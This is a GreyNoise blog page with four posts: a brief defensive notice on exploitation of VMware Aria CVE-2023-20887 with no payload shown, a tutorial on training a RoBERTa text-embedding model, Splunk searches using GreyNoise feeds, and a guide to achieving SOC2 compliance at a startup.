Blog

Observed In The Wild: New Tag For CVE-2023-20887 - VMware Aria Operations for Networks

On June 7, 2023, VMware released an advisory for CVE-2023-20887, a command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Cloud Management) with a critical severity score (CVSS) of 9.8. A proof of concept for the exploit was released on June 13, 2023 by SinSinology.

The primary takeaway is:

“VMWare Aria Operations Networks is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user.” – SinSinology


This issue can be resolved by updating to the latest version. Further information can be found here: https://www.vmware.com/security/advisories/VMSA-2023-0012.html

At the time of writing, we have observed attempted mass-scanning activity that uses the proof-of-concept code mentioned above to launch a reverse shell, which connects back to an attacker-controlled server to receive further commands. Activity related to this vulnerability can be monitored on an ongoing basis via the relevant GreyNoise tag below.

Example HTTP POST request containing code to exploit the described vulnerability

Text Embedding for Fun and Profit

Words != Numbers

Computers don’t understand words. They don’t understand verbs, nouns, prepositions, or even adjectives. They kinda understand conjunctions (and/or/not), but not really. Computers understand numbers.

To make computers do things with words, you have to make them numbers. Welcome to the wild world of text embedding!

In this blog I want to teach you about text embedding, why it’s useful, and a couple ways to do it yourself to make your pet project just a little bit better or get a new idea off the ground. I’ll also describe how we’re using it at GreyNoise.

Use Cases

With LLMs in the mix, modern use cases of text embedding are all over the place.

  • Can’t fit all your text into a context window? Try embedding and searching the relevant parts.
  • Working on sentiment analysis? Try to build a classifier on embedded text.
  • Looking to find similar texts? Create a search index on embedded values
  • Want to build a recommendation system? Figure out how things are similar without building a classification model

In all of these, we’re encoding a piece of text into a numerical vector in order to do basic machine learning tasks against it, such as nearest neighbors or classification. If you’ve been paying attention in class, this is just feature engineering, but it’s unsupervised and on unstructured data, which has previously been a really hard problem.
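To make the "nearest neighbors on embedded text" idea concrete, here is a minimal sketch in plain Python. The three-dimensional vectors and the payload labels are made up for illustration (real embeddings have hundreds of dimensions), and a real search index would use a dedicated library rather than a sorted list.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

def nearest_neighbors(query, index, k=2):
    """Return the k labels in `index` whose vectors are most similar to `query`."""
    ranked = sorted(
        index,
        key=lambda label: cosine_similarity(query, index[label]),
        reverse=True,
    )
    return ranked[:k]

# Hypothetical embeddings keyed by the text they were computed from.
index = {
    "GET /index.html": [0.9, 0.1, 0.0],
    "GET /home.html": [0.8, 0.2, 0.1],
    "POST /login (sql injection)": [0.1, 0.9, 0.3],
}

query = [0.85, 0.15, 0.05]  # embedding of some new, unseen text
top = nearest_neighbors(query, index, k=2)
```

Once text is a vector, "find similar things" is just a distance comparison, which is why the same trick powers search, recommendations, and classification features.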

How to method 1: Cheat mode

Lots of large models offer sentence-level embedding APIs. One of the most popular is OpenAI’s (https://platform.openai.com/docs/guides/embeddings). It doesn’t cost a ton, probably under $100 for most data sets, but you’re dependent on the latency of external API calls and the whims of another company. Plus, since it’s a GPT model, the embedding is based on the encoding of the last word in your text (with the cumulative words before it). That doesn’t feel as cohesive as what I’m going to suggest next. (This is foreshadowing a BERT vs GPT discussion.)

How to method 2: Build your own

Side quest: GPT vs BERT

GPT stands for Generative Pre-trained Transformer. It is built to predict the next word in a sequence, and then the next word, and then the next word. In contrast, BERT stands for Bidirectional Encoder Representations from Transformers. It is built to predict any word within a set piece of text.

The little bit of difference between them, because they both use Transformers, is where they mask data while training. During the training process a piece of the text is masked, or obscured, from the model and the model is asked to predict it. When the model gets it right, hooray! When the model gets it wrong, booo! These actions either reinforce or change the weights of the neural network to hopefully better predict in the future. 

GPT models only mask the last word in a sequence. They are trying to learn and predict that word. This makes them generative. If your sequence is “The cat jumped” it might predict “over”. Then your sequence would be “The cat jumped over” and it might predict “the”, then “dog”, etc. 

BERT models mask random words in the sequence, so they take the entire sequence and try to figure out the masked word based on what came before and after (bidirectional!!!). For this reason, I believe they are better for text embedding. Note that the biggest GPT models are orders of magnitude bigger than the biggest BERT models because there is more money in generation than in encoding/translation, so it is possible GPT-4 does a better job at generic sentence encoding than a homegrown BERT. But let's all collectively stick it to the man and build our own. It’s easy.

Figure 1: BERT based masking
Figure 2: GPT based masking
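The two masking styles can be sketched in a few lines of Python. This is a simplified illustration of the description above, not how either model family is actually trained: the `<mask>` string, the function names, and the 15% masking rate are assumptions chosen for the example.

```python
import random

MASK = "<mask>"

def gpt_style_example(tokens):
    """Hide the final token; the model must predict it from everything before it."""
    masked = tokens[:-1] + [MASK]
    targets = {len(tokens) - 1: tokens[-1]}
    return masked, targets

def bert_style_example(tokens, mask_prob=0.15, seed=0):
    """Hide random positions; the model predicts them from context on both sides."""
    rng = random.Random(seed)
    masked, targets = list(tokens), {}
    for i, tok in enumerate(tokens):
        if rng.random() < mask_prob:
            masked[i] = MASK
            targets[i] = tok
    if not targets:  # short inputs: make sure at least one position is masked
        i = rng.randrange(len(tokens))
        masked[i], targets[i] = MASK, tokens[i]
    return masked, targets

tokens = "The cat jumped over the dog".split()
gpt_input, gpt_targets = gpt_style_example(tokens)
bert_input, bert_targets = bert_style_example(tokens)
```

In the GPT-style example the model only ever sees what came before the hidden word. In the BERT-style example the hidden word can sit anywhere, so the surrounding words on both sides are available as context.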

Main quest: Building a text encoder

If your data is not just basic English text, building your own encoder and model might be the right decision. For GreyNoise, we have a ton of HTTP payloads that don’t exactly follow typical English language syntax. For this reason, we decided to build our own payload model and wanted to share the knowledge.

There are two parts to an LLM, the same parts you’ll see in Hugging Face models (https://huggingface.co/models) and everywhere else: a tokenizer and a model.

Tokenizer

The tokenizer takes your input text and translates it to a base numerical representation. You can train a tokenizer to learn vocabulary directly from your dataset or use the one attached to a pre-trained model. If you are training a model from scratch you might as well train a tokenizer (it takes minutes), but if you are using a pre-trained model you should stick with the one attached. 

Tokens are approximately words, but if a word is over 4-5 characters it might get broken up. “Fire” and “fly” could each be one token, but “firefly” would be broken into 2 tokens. This is why you might often hear that a token is “about ¾ of a word”: it’s the average ratio of words to tokens. Once you have a tokenizer, it can translate a text into integers, each representing the index of a token in the tokenizer’s vocabulary.

“The cat jumped over” -> 456, 234, 452, 8003

Later, supposing we have a model, if you have the output 8003, 456, 234, 452 (I reordered on purpose) you could translate that back to “over the cat jumped”

The tokenizer is the translation of a numeric representation to a word (or partial word) representation. 
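Here is a toy version of that round trip. The vocabulary below is hypothetical: it reuses the IDs from the example above and splits on whitespace only, whereas a trained tokenizer learns subword pieces from your data.

```python
# Toy vocabulary; the IDs mirror the example in the text and are otherwise arbitrary.
vocab = {"The": 456, "cat": 234, "jumped": 452, "over": 8003}
id_to_token = {idx: tok for tok, idx in vocab.items()}

def encode(text):
    """Text -> list of integer token IDs (whitespace split, no subwords)."""
    return [vocab[word] for word in text.split()]

def decode(ids):
    """List of integer token IDs -> text."""
    return " ".join(id_to_token[i] for i in ids)

ids = encode("The cat jumped over")        # [456, 234, 452, 8003]
reordered = decode([8003, 456, 234, 452])  # same tokens, different order
```

The mapping works in both directions, which is all the model needs: integers in, integers out, and the tokenizer handles the text on either side.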

Model

With a tokenizer, we can pass numerical data to a model, get numerical data out, and then decode that back to text.

We could discuss the models, but others have done that before (https://huggingface.co/blog/bert-101). All of these LLMs are beasts. They have basic (kinda) components, but they have a lot of them, which makes for hundreds of millions to billions of parameters. For 98% of people, you want to know what it does, the pitfalls, and how to use it without knowing the inner workings of how transformer layers are connected to embedding, softmax, and other layers. We’re going to leave that to another discussion. We’ll focus on what it takes to train and get a usable output.

The models can be initialized with basic configs and trained with a few simple calls, thanks to the folks at Hugging Face (you the real MVP!). For this we are going to use a RoBERTa model (https://huggingface.co/docs/transformers/model_doc/roberta). You could use a pre-trained model and fine-tune it; however, we’re just going to use the config and build the whole model from scratch with random weights. A very similar workflow is usable if you want to use a pre-trained model and tokenizer though. I promise I won’t judge.

Code

Import or copy the code from the model training gist.

Create your own list of text you want to train the encoder and model on. It should be at least 100k samples.

If you have created your data set as `str_data` and set a model path as a folder where you want to save the model and tokenizer, you can just do:

tokenizer = create_tokenizer(model_path, str_data[0:50000]) ## you don’t really need more than 50k to train the tokenizer
model = create_model_from_scratch(model_path, tokenizer)

This will create the tokenizer and model. The tokenizer is usable at this state. The model is just random untrained garbage though.

When you’re ready for the first training run, get into the habit of loading the tokenizer and model you created and then training. The saved states you load from are what people call “checkpoints”.

from transformers import RobertaForMaskedLM, RobertaTokenizerFast

tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
model = RobertaForMaskedLM.from_pretrained(model_path)
model = train_model(tokenizer, model, model_path, str_data[0:100000]) ## train_model comes from the gist; train on however much you want at a time, there is a whole other discussion about this, but give it at least 100k samples.

When you want to retrain or further train, which at this point is also called fine-tuning, just load it up and go again with new or the same data. Nobody is your boss and nobody really knows what is best right here.

Note: You’re going to want to use GPUs for training. Google Colab and Hugging Face Notebooks have some free options. All in, this particular model will require 9-10GB of GPU memory, easily attainable on commodity hardware.

Evaluating

Large Language Models do not have a great list of sanity checks. Ironically, most benchmarks are against other LLMs. For embeddings, we can do a little better and tailor the check to your own model. When you take two samples that you think are similar and run them through the model to get the embeddings, you can calculate how far apart they are with either cosine or Euclidean distance. This gives you a sanity check of whether your model is performing as expected or is just off the rails.

For Euclidean distance use:

import numpy as np

euclidean_dist = np.linalg.norm(embedding1 - embedding2)

For cosine similarity (cosine distance is 1 minus this value) use:

from sklearn.metrics.pairwise import cosine_similarity

cos_sim = cosine_similarity(embedding1.reshape(1, -1), embedding2.reshape(1, -1))
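Putting the two metrics together, a sanity check could look something like the sketch below. It uses only the standard library so it runs anywhere, and the three vectors are made-up stand-ins for real embeddings: two samples you believe are similar and one you believe is not.

```python
import math

def euclidean_distance(a, b):
    """Straight-line distance between two equal-length vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def cosine_distance(a, b):
    """1 minus cosine similarity; 0 means the vectors point the same way."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return 1.0 - dot / norm

def passes_sanity_check(anchor, similar, dissimilar):
    """True if `similar` is closer to `anchor` than `dissimilar` under both metrics."""
    return (
        cosine_distance(anchor, similar) < cosine_distance(anchor, dissimilar)
        and euclidean_distance(anchor, similar) < euclidean_distance(anchor, dissimilar)
    )

# Hypothetical embeddings, hand-written for illustration.
similar_a = [0.2, 0.8, 0.1]
similar_b = [0.25, 0.75, 0.1]
different = [0.9, 0.05, 0.4]

ok = passes_sanity_check(similar_a, similar_b, different)
```

If a handful of pairs you picked by hand fail this check after training, that is a cheap early signal that the model needs more data or more training before you build anything on top of it.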

How We’re Using it at GreyNoise

We’re early adopters of LLM tech at GreyNoise, but it is hard to put it in the hands of users responsibly. We basically don’t want to F up. We have an upcoming feature called NoiseGPT that takes natural language text and turns it into GNQL queries. Begone the days of learning a new syntax for just figuring out what the hell is going on. 

We also have an in-development feature called Sift, a way to tease out the new traffic on the internet and describe it for users. This would take the hundreds of thousands of HTTP payloads we see every day, reduce them to the ~15 new and relevant ones, and describe what they are doing. EAP coming on that soon.

Plus, if you think of any great ideas we should be doing, please hit us up. We have a community slack and my email is below. We want to hear from you. 

Fin

With these tips I hope you’re able to create your own LLM for your projects or at least appreciate those that do. If you have any questions please feel free to reach out to daniel@greynoise.io, give GreyNoise a try (https://viz.greynoise.io/), and look out for features using these techniques in the very near future.

Splunk and GreyNoise Integration: Discovering Hidden Insights through Feeds and Dashboards

If you’ve ever seen a GreyNoise presentation by me, it’s more than likely that at some point I pulled up my Splunk instance to show what I would consider to be a few clever dashboards and searches. Apart from the impromptu searches that I may write (which may not be great), there are some powerful and practical ways you can leverage GreyNoise data inside your Splunk environment right now.

Feeds

With the latest version of the GreyNoise app for Splunk (v2.2.0), you can now keep the last 24 hours of data local to your Splunk instance with feeds. Plus, it’s easier than ever to filter out noise from large datasets. Instead of relying on API lookups, the data can be referenced locally first to remove opportunistic and benign IPs quickly when hunting through your data.

Filtering web logs by IPs not observed by GreyNoise: index=main sourcetype=access_combined | lookup greynoise_indicators.csv ip as clientip | search NOT classification=benign
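If you want to see the logic of that search outside of Splunk, the sketch below does the same kind of local lookup in plain Python. The CSV contents, the field names on the events, and the helper names are all hypothetical stand-ins; only the idea (join events to a local indicator table, then drop anything classified as benign) comes from the search above.

```python
import csv
import io

# Hypothetical stand-in for a locally stored indicator feed.
FEED_CSV = """ip,classification
198.51.100.7,benign
203.0.113.9,malicious
"""

def load_feed(csv_text):
    """Build an ip -> classification lookup table from CSV text."""
    return {row["ip"]: row["classification"] for row in csv.DictReader(io.StringIO(csv_text))}

def drop_benign(events, feed):
    """Keep events whose client IP is not classified as benign in the feed."""
    return [e for e in events if feed.get(e["clientip"]) != "benign"]

events = [
    {"clientip": "198.51.100.7", "uri": "/robots.txt"},
    {"clientip": "203.0.113.9", "uri": "/login"},
    {"clientip": "192.0.2.44", "uri": "/admin"},
]

feed = load_feed(FEED_CSV)
remaining = drop_benign(events, feed)
```

Note that an IP missing from the feed is kept, which mirrors how `NOT classification=benign` keeps events that have no classification at all.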

Dashboards

A good dashboard can turn a bad day into a great one.

I always joke that data isn’t real until it’s displayed on a map, but there's some truth to it! Having a quick overview of your data visually makes it easier to piece together an understanding of the scan activity landscape.

Using custom commands, you can pull out information on internet traffic to safely and confidently ignore (things we classify as ‘benign’ or IPs from the RIOT dataset) and particular pieces of information you may want to investigate further. Everything left over will include the IPs that are not in GreyNoise, which could indicate more targeted attacks, and IPs we classify as ‘unknown’.

You can find more information about our classifications and how to apply GreyNoise data to your analysis in our documentation: https://docs.greynoise.io/docs/applying-greynoise-data-to-your-analysis

Paired with information from your firewall imported into Splunk, GreyNoise data leveraged in a dashboard can show vulnerabilities that ‘unknown’ IPs are specifically looking for. Combining this knowledge with your current vulnerability scans can help you quickly identify if someone is interested in vulnerabilities specific to your attack surface.

Using GreyNoise with firewall data to build a dashboard to find potentially targeted activity as well as provide details for how IP addresses are operating.

Known Good

We talk a lot about filtering out opportunistic traffic and enriching data based on GreyNoise, but let’s not sleep on the RIOT dataset. If you’re not familiar with RIOT, it’s a collection of ~50 million IP addresses that are associated with common business services.

What does this let you do with your data in Splunk? There are a lot of ways that people are applying this dataset in their searches and hunting. Ryan Kovar wrote a great blog post about using wire data with Splunk (https://www.splunk.com/en_us/blog/security/wire-data-huh-what-is-it-good-for-absolutely-everything-say-it-again-now.html), and while legitimate services can be abused (Hello T1567!), they can also make up a significant portion of the traffic being searched. RIOT makes it easy to do a first pass, remove any outbound traffic to those services, and find potentially interesting traffic.

Using RIOT to summarize outbound network activity using Squid proxy data: index=main source=squid:access | gnriot ip_field=src | rename greynoise_name as organization | stats count by organization
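The "count by organization" step in that search is just a group-and-count. A rough Python equivalent, with a made-up two-entry stand-in for the RIOT dataset and made-up proxy IPs, might look like this:

```python
from collections import Counter

# Hypothetical RIOT-style mapping of IP -> provider name.
riot = {"192.0.2.10": "ExampleCDN", "192.0.2.20": "ExampleMail"}

# Hypothetical IPs pulled from proxy logs.
proxy_ips = ["192.0.2.10", "192.0.2.10", "192.0.2.20", "198.51.100.99"]

# Count traffic per known business service.
by_org = Counter(riot[ip] for ip in proxy_ips if ip in riot)

# Whatever is left is the part worth a closer look.
not_in_riot = [ip for ip in proxy_ips if ip not in riot]
```

The summary tells you how much of the traffic is accounted for by common services, and the leftover list is the smaller pile you actually want to hunt through.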

More on our RIOT dataset here: https://docs.greynoise.io/docs/riot-data

Learn More About GreyNoise + Splunk

If you find this information useful then join me on June 15th for a live webinar where I’ll cover the Splunk integration in detail. Also, if you are going to .conf 23 we will be there as well! Swing by booth 103 or set up a meeting with us here.  

SOC2 For Startups

GreyNoise today announced that it achieved SOC 2 Type 2 compliance in accordance with American Institute of Certified Public Accountants (AICPA) standards for Systems and Organizational Controls (SOC). Achieving SOC 2 compliance with an unqualified opinion serves as third-party industry validation that companies provide best-in-class enterprise-level security for their customers’ data.

SOC2 is a difficult undertaking, especially if you do not have dedicated compliance or security resources who will contribute to creating the policies and implementing the changes. If you take one thing away from this post, let it be this: hire for Systems Administrator and IT operations roles before you think you need them because it will be too late by the time you do need them. Systems Administration tech debt and work is an exponential curve; the longer you go without them, the harder it becomes to fix. Aside from the struggle of collecting evidence through screenshots and questionnaires, both systems administration and engineering cycles will be required to meet the framework standards and controls. 

Foundation

SOC2 is broken out into five pillars: 

  1. Security of a service organization's system.
  2. Availability of a service organization's system.
  3. Confidentiality of customer information.
  4. Processing integrity of a service organization's system.
  5. Privacy of customer personal information.

Approaching the controls one-by-one can be a daunting task. We found it was more manageable to divide the process into general phases, the last of which is the audit itself.

Phase 1 - Pick the platforms

Our advice here is to not go it alone. From evidence collection and auditor documentation delivery to infrastructure and compliance control scanning, there are myriad different vendors which make every step of the process easier. Take time choosing the auditor that is right for you. Some are very “by the book” and others will be more lenient on “acceptable risk” controls. 

You will need platforms for a lot of controls, including SAST, vulnerability scanning, asset tracking/management, version control, and more. For the most part, free open-source software exists for each step along the way. We found it best to mix and match, opting for paid platforms where open-source implementation was going to take too much engineering time away from other ongoing projects. For example, open-source options include gosec and tfsec for some language-specific SAST scanning, Cloudflare’s Flan for internal vulnerability scanning, and Grokability Snipe-IT for asset management, as opposed to paid options such as GitHub Advanced Security licenses, Tenable Nessus, ServiceNow ServiceDesk, or Oomnitza. The latter are perfectly useful products, but it’s important to decide what you want to pay for versus what you can run yourself for free. The value any company puts on each function or service the platform provides compared to the cost or time value of money will be different.

The two direct SOC2-specific platform choices are the auditor and the compliance automation platform. SOC2 is significantly more difficult without a compliance automation platform - we estimate using such a platform saves over a hundred hours of work.

Auditors: Check which audit firm was used when you collect your SOC2 and SOC3 reports from your vendors. Turn that list into your potential auditor review list, and make a decision for an audit firm based on your meetings and due diligence with those firms. GreyNoise went with Prescient Assurance. They have a security arm that can provide your third-party penetration test, which is optional for SOC2, for a bundle discount.

Compliance Automation: Auditors will need access to a mountain of evidence in the form of read-only access to your environment, screenshots, and questionnaire answers. This is made easier with a compliance automation platform. Whereas an audit firm may not have a process in place for provisioning roles for their access, compliance platforms do, and they make it easy to both roll out and roll back. GreyNoise decided to use SecureFrame because its pricing, offering, and overall functionality were more directly suited to our needs. Some other popular options include Drata, Vanta, HyperProof, Anecdotes, and Tugboat Logic.

Phase 2 - Knock out the big stuff

Implement, document, and be able to explain the following eight “heavy-hitters”.

  1. SSO and IAM
  2. PRs, CI/CD, and Version Control
  3. SIEM or Centralized Logging
  4. Infrastructure and Provisioning
  5. MDM
  6. Vendor Management
  7. Scanning
  8. CorpSec

SSO and IAM

Set up Okta, Google Cloud Identity, OneLogin, Azure Active Directory, or Auth0. The choice here depends on what technology you are already using for business productivity. If you are already using Office 365, then Azure Active Directory is the easy choice. If you are already using Google Workspace, then Google Cloud Identity may be the best option. When an employee logs into anything, they would ideally use their work credentials as much as possible. Enforce multi-factor authentication everywhere. Ditch single-user access and access keys and switch to “AssumeRole” if you are leveraging AWS, GCP, or Azure. In our environment, we added SAML tokens to each user in Google Workspace allowing them to assume a role (Read Only, Billing, Administrator, etc.) in the corresponding AWS accounts.

Set a secure login preference order:

  1. Require login via SSO (Okta / Google Cloud Identity)
  2. Require sign in with Google Workspace or Office 365
  3. Require 2FA with standard login OR “magic” link
  4. Standard login

Leverage an organization-wide password manager like 1Password or Bitwarden, with separate “vaults” for departments and roles. Use something with automatic detection of weak or reused passwords, and enforcement of strong password policies.

PRs, CI/CD, and Version Control

Implement an approval process for your pull requests. Don’t limit it to just a manual review by engineering management or leadership. Include automated unit, integration, and end-to-end tests along with code scanning to ensure builds are passing and security policies/controls are green. Diagram out the overall process.

You will need different environments - such as development, staging, and production. Deployments move across each, and are tested in each before actual implementation in the production environment. Ideally, changes to these environments would be tracked and dictated by GitHub, GitLab, BitBucket, or some other code version control platform.

SIEM or Centralized Logging

A SIEM is not a requirement for SOC2, but extensive logging capabilities with alerting are. If there is a resource or storage essential to the operation of your product or business, access and audit logs for the resource should be easily retrieved and reviewed. 

If an employee logs in to a resource from Washington, DC and then logs in from Seattle, WA, a few moments later from a different device, you need to know about it immediately through logging or block that second login altogether. If 100GB of data is downloaded from an S3 bucket when the daily average is 10GB, alarm bells should go off. Establish what “normal” is, and have a process in place to regularly review anomalous activity or anything outside of that normal bound. 
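Both of those alerts boil down to simple arithmetic once the logs are centralized. The sketch below is one hedged way to express them in Python. The speed ceiling, the spike factor, the event shape, and the function names are assumptions for illustration, and a real deployment would rely on your logging platform's own detection rules.

```python
import math
from datetime import datetime

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0  # assumed ceiling, roughly airliner cruising speed

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two latitude/longitude points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))

def is_impossible_travel(prev, curr, max_kmh=MAX_PLAUSIBLE_KMH):
    """Flag two logins whose implied travel speed exceeds max_kmh."""
    hours = (curr["time"] - prev["time"]).total_seconds() / 3600
    km = haversine_km(prev["lat"], prev["lon"], curr["lat"], curr["lon"])
    if hours <= 0:
        return km > 0
    return km / hours > max_kmh

def is_volume_spike(observed_gb, daily_average_gb, factor=5.0):
    """Flag a download volume far above the established daily average."""
    return observed_gb > factor * daily_average_gb

# Login from Washington, DC followed five minutes later by one from Seattle, WA.
dc = {"time": datetime(2023, 6, 1, 9, 0), "lat": 38.9072, "lon": -77.0369}
seattle = {"time": datetime(2023, 6, 1, 9, 5), "lat": 47.6062, "lon": -122.3321}

flagged = is_impossible_travel(dc, seattle)
spike = is_volume_spike(observed_gb=100, daily_average_gb=10)
```

The hard part is not the math, it is knowing what "normal" looks like for your environment so the thresholds mean something.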

Collecting logs will help you in post-incident response situations. Regularly reviewing and alerting on those logs will help you to avoid post-incident response situations.

Infrastructure and Provisioning

Have a reproducible process in place for spinning up infrastructure resources. This can be implemented with Infrastructure as Code and configuration management tools like Salt, Ansible, Terraform, Chef, Puppet, or CloudFormation. 

SOC2 will be significantly more painful if infrastructure in your environment is created manually by the engineering or IT team without an approval process or automation. GreyNoise infrastructure is entirely in Terraform and Salt. This way, approval and automation are shared with the CI/CD and pull request pipeline. If a process already exists that can be leveraged, it will save time. 

The general idea here is that you should do as much as possible NOT in the web console for something like AWS, Azure, or vCenter. Take note of any actions you perform in the web console - this is your automation list.

Mobile Device Management (MDM)

Install an MDM platform on all company-owned desktops, laptops, and phones: any device that will access the internal systems of your product or customer data. Roll out the “compliance” packs for SOC2 to enforce things like password complexity, disk encryption, and software update cadence.

This is a crowded space, often undergoing expansion and consolidation. Fleetsmith was a great macOS and iOS MDM tool. Apple acquired the company and quickly removed all capability to install third-party (non-Apple and non-App Store) apps. Apple killed the product two years after the acquisition. The gold standard for macOS and iOS seems to be Jamf/Jamf Pro.

GreyNoise ended up splitting MDM platforms: one for Mac and one for Windows/Linux. It is a difficult choice to make between a broader platform that covers three Linux distributions, Windows, and macOS at a percentage of what you need, and two or three platforms that each cover almost all of what you need.

Vendor Management

A lot of time will be spent on scoring vendor risk based on their operational reliance and the data they access or contain. Part of SOC2 requires collecting compliance reports from these vendors (SOC2, SOC3, ISO 27001, etc.) and reviewing them annually. A comprehensive list of vendors is important to keep up to date for both compliance and cost control reasons.
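One simple way to score vendors on those two axes is a small lookup table. The scales, thresholds, and vendor names below are hypothetical and only meant to show the shape of the exercise; your auditor or compliance platform may prescribe a different rubric.

```python
# Hypothetical 1-3 scales; tune these to your own risk policy.
RELIANCE = {"low": 1, "medium": 2, "critical": 3}
DATA_ACCESS = {"none": 1, "internal": 2, "customer": 3}

def vendor_risk(reliance, data_access):
    """Return (score, tier) from operational reliance and data access."""
    score = RELIANCE[reliance] * DATA_ACCESS[data_access]
    if score >= 6:
        return score, "high"
    if score >= 3:
        return score, "medium"
    return score, "low"

vendors = [
    {"name": "ExampleChat", "reliance": "medium", "data_access": "internal"},
    {"name": "ExampleCloud", "reliance": "critical", "data_access": "customer"},
    {"name": "ExampleSwag", "reliance": "low", "data_access": "none"},
]

# Review the riskiest vendors first.
ranked = sorted(
    vendors,
    key=lambda v: vendor_risk(v["reliance"], v["data_access"])[0],
    reverse=True,
)
```

Even a crude score like this makes the annual review easier to prioritize, since high-tier vendors are the ones whose compliance reports deserve the closest read.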

In developing this list, GreyNoise found a handful of vendors we were still paying but either were not using or whose functionality was duplicated by another platform. Ultimately, SOC2 required us to enumerate our vendors and generate a Software Bill of Materials (SBOM), and it led to cost savings by eliminating or consolidating redundant platforms.

Scanning

An understandably broad topic, but for SOC2 specifically you should be scanning for:

  • Vulnerabilities in dependencies/packages
  • Vulnerabilities in infrastructure in general - both internal and external
  • SOC2 compliance controls 

Each finding should have a rating from informational to critical, and each rating should have a time-to-resolution SLA which dictates how quickly you must respond to and remediate it. There are some free solutions which offer compliance control monitoring, such as Steampipe compliance packs for AWS. GreyNoise decided to partner with SecureFrame to streamline the monitoring of these controls and to provide auditors with access to our provided documentation and evidence quickly and securely. A compliance automation vendor is strongly recommended for time and sanity's sake.
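A rating-to-SLA mapping is easy to encode so that overdue findings surface automatically. The day counts below are hypothetical placeholders, not a recommendation; use whatever windows your own policy commits to.

```python
from datetime import date, timedelta

# Hypothetical SLA windows in days, keyed by severity rating.
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180, "informational": 365}

def due_date(found_on, severity):
    """Date by which a finding of this severity must be remediated."""
    return found_on + timedelta(days=SLA_DAYS[severity])

def is_overdue(found_on, severity, today):
    """True once the remediation deadline has passed."""
    return today > due_date(found_on, severity)

finding = {"id": "VULN-1", "severity": "critical", "found_on": date(2023, 5, 1)}

deadline = due_date(finding["found_on"], finding["severity"])
overdue = is_overdue(finding["found_on"], finding["severity"], today=date(2023, 5, 10))
```

Having the deadlines computed rather than remembered also gives you clean evidence for the audit: every finding has a rating, a due date, and a resolution date.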

CorpSec

SOC2 includes some business operational aspects which will encompass a few different departments or teams in your organization. The following are some examples required for SOC2:

  • Background checks for employees. 
  • Annual security and privacy training for employees. 
  • Documented processes for onboarding, offboarding, encryption, data retention, etc.
  • Regular board meetings, with meeting minutes and bylaws.
  • Quarterly access security reviews.
  • Job descriptions for all roles.

Many compliance automation platforms include auto-generated policies which require slight tweaking and adjustments to pass the “policy” controls. Invest time in either writing your own or significantly building on the automated policy output from your compliance platform. There are plenty of great security companies who publicly publish their policies (https://tailscale.com/security-policies/) which you can build on and adapt to your needs. GreyNoise will also publish our policies in the near future.

Phase 3 - Red to Green

Failing controls and tests will pop up after rolling out the compliance automation platform. The time to resolve these controls varies significantly, so expect this phase to take the longest. In our experience, the controls that took longest to flip from red to green were “all data encrypted in transit” and “all data encrypted at rest”.

You will want to resolve these tests until at least 90% are green before kicking off the audit itself. Work with your team to bucket the failing controls, and turn them into issues or projects to be assigned. You can even provide screenshot evidence of these projects and issues as proof of your organization’s incident tracking from discovery to resolution for the SOC2 audit.
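Tracking the 90% bar and bucketing what is left can be as simple as the sketch below. The control names and owners are invented for the example, and most compliance automation platforms will show you an equivalent view out of the box.

```python
from collections import defaultdict

READY_THRESHOLD = 0.90  # the "at least 90% green" bar mentioned above

# Hypothetical control results exported from a compliance platform.
controls = [
    {"name": "MFA enforced", "passing": True, "owner": "IT"},
    {"name": "Encryption at rest", "passing": False, "owner": "Engineering"},
    {"name": "Encryption in transit", "passing": False, "owner": "Engineering"},
    {"name": "Background checks", "passing": True, "owner": "People Ops"},
]

def pass_rate(controls):
    """Fraction of controls currently passing."""
    return sum(c["passing"] for c in controls) / len(controls)

def bucket_failures(controls):
    """Group failing control names by owning team."""
    buckets = defaultdict(list)
    for c in controls:
        if not c["passing"]:
            buckets[c["owner"]].append(c["name"])
    return dict(buckets)

rate = pass_rate(controls)
ready_for_audit = rate >= READY_THRESHOLD
failing_by_owner = bucket_failures(controls)
```

Each bucket maps naturally to an issue or project for that team, which doubles as the tracking evidence described above.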

This is the phase which will likely take the most time, money, and effort from your team. Unless you “shifted left” right out of the gate and began developing on day one with a security mindset baked in, plan to dedicate a few weeks or a couple of months to remediating failing controls.

Part of the phase also includes screenshot and evidence gathering. SecureFrame helped GreyNoise to easily organize this evidence and gave us an easy way for auditors to access it. This may take several days or weeks to complete and you will wind up with hundreds of screenshots, documents, templates, and examples. 

Phase 4 - Audit

One thing to note is that you will never see a failed SOC2 report or audit. You either get a report or not. If you fail to get a report, you can always try again when you are better positioned. Failure means you get to try again until you succeed. Success means you still need to do it again next year.

Timeline

From project kickoff to completion, SOC2 took GreyNoise about 18 months for the first time. Recertification, which needs to be completed annually, will take us about four months moving forward. 

The time to complete SOC2 accreditation can be greatly reduced by dedicating more resources to the implementation and maintenance of compliance. The shortest amount of time we imagine possible for first-time SOC2 accreditation is six months.

Keep in mind that you will be reperforming the audit exactly one year after you receive the accreditation. You may decide to add some other compliance certifications, such as ISO 27001. As time goes on and your company grows, compliance becomes harder and will require a dedicated team.

Two Audits

The audit process is broken down into two phases, Type 1 and Type 2. Type 1 is a short audit period, usually a couple of days, and Type 2 is longer, usually between 60 and 90 days. 

Type 1 means you meet the audit criteria at a single point in time; Type 2 means you maintain compliance with those same criteria over a period of several months. In other words, Type 1 is meeting the compliance standard, and Type 2 is maintaining that compliance standard with any changes over time.

Conclusion

Here are some of our opinions, takeaways, and advice:

  • SOC2 will take you longer than you think
  • Hire System Administrators and IT operations early, as part of the first 20 employees
